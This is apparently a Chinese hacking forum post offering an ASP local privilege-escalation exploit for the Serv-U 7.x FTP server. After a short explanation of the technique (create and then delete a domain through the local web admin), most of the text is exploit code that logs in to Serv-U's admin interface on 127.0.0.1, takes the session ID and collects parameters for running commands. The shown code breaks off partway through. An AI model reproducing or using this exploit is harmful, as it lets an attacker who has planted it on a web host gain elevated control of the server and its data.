本地提权 支持serv-u 7.x的asp版

私奔

思路是沿用空虚浪子心的提权方法,由于asp不支持操作socket,只能采用新建域再删除.程序界面是抄袭陆大的serv-u 6.X回显程序的,嘿嘿.由于本人菜,找不出serv-u 7.0的userid究竟是怎么变化的,所以只删除了域......  
serv-u 7.4连不上的原因找出来了,原来是7.0以上的版本新增加了域之后会延迟一段时间才启动.原来的exp可以正常使用.为了大家方便,在上面添了一句话,重新奉上.


EXP:

<style type="text/css">  
<!--  
body,td,th {  
font-size: 12px;  
}  
-->  
</style>  
<%  
Function httpopen(neirong,fangshi,dizhi,refer,cookie)  
set Http=server.createobject("Microsoft.XMLHTTP")  
Http.open fangshi,dizhi,false  
Http.setrequestheader "Referer",refer  
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"  
Http.setrequestheader "Content-length",len(neirong)  
Http.setrequestheader "User-Agent","Serv-U"  
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"  
If cookie<>"" then  
Http.setrequestheader "Cookie",cookie  
End If  
Http.send neirong  
httpopen=bytes2BSTR(Http.responseBody)  
set Http=nothing  
end Function

Function getmidstr(L,R,str)  
int_left=instr(str,L)  
int_right=instr(str,R)  
If int_left>0 and int_right>0 Then   
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))  
Else  
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"   
End If  
end Function

Function bytes2BSTR(vIn)   
strReturn = ""   
For i = 1 To LenB(vIn)   
ThisCharCode = AscB(MidB(vIn,i,1))   
If ThisCharCode < &H80 Then   
strReturn = strReturn & Chr(ThisCharCode)   
Else   
NextCharCode = AscB(MidB(vIn,i+1,1))   
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))   
i = i + 1   
End If   
Next   
bytes2BSTR = strReturn   
End Function   
%>  
<%  
    ’----------自定义参数开始-----------

action=Request("action")  
loginpass=Request.Form("loginpass")  
port=Request("port")  
mydomain=Request.Form("mydomain")  
path=Request.Form("path")  
ftpport = Request.Form("ftpport")  
user=Request.Form("user")  
pass=Request.Form("pass")  
cmd= Request.Form("cmd")  
sessionid=Request("sessionid")  
OrganizationId=Request("OrganizationId")  
userid=Request("userid")  
domainid=Request("domainid")

    ’----------自定义参数结束-----------

select case action

case 1  
returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","http://127.0.0.1:"&port&"/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543","http://127.0.0.1:"&port&"/?Session=39893&Language=zh,CN&LocalAdmin=1","")  
sessionid=getmidstr("<sessionid>","</sessionid>",returns)  
if sessionid<>"" then  
Response.Write "login ok!"&"</br>"  
Response.redirect "?action=2&sessionid="&sessionid&"&port="&port  
else  
Response.Write "error!"&"</br>"  
end if   

case 2  
call main2()

case 3  
returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1","",sessionid)  
OrganizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)  
OrganizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)